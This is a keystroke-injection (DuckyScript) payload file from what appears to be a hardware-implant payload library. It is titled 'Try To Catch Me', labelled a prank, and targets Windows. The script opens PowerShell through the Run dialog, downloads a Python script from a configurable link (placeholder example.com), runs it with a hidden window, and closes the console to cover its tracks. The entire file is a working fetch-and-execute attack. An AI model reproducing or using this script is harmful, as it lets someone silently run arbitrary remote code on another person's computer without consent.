omg-payloads/payloads/library/prank/Try_To_Catch_Me/payload.txt

32 lines
742 B
Plaintext
Raw Normal View History

2023-06-12 12:26:51 +00:00
REM ####################################
REM # |
REM # Title : Try To Catch Me |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################
REM Requirements:
REM - Internet Connection
REM REQUIRED - Set your Python script link
2023-06-12 18:06:13 +00:00
DEFINE #SCRIPT-PY-LINK example.com
2023-06-12 12:26:51 +00:00
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
2023-06-12 18:06:13 +00:00
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
2023-06-12 12:26:51 +00:00
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4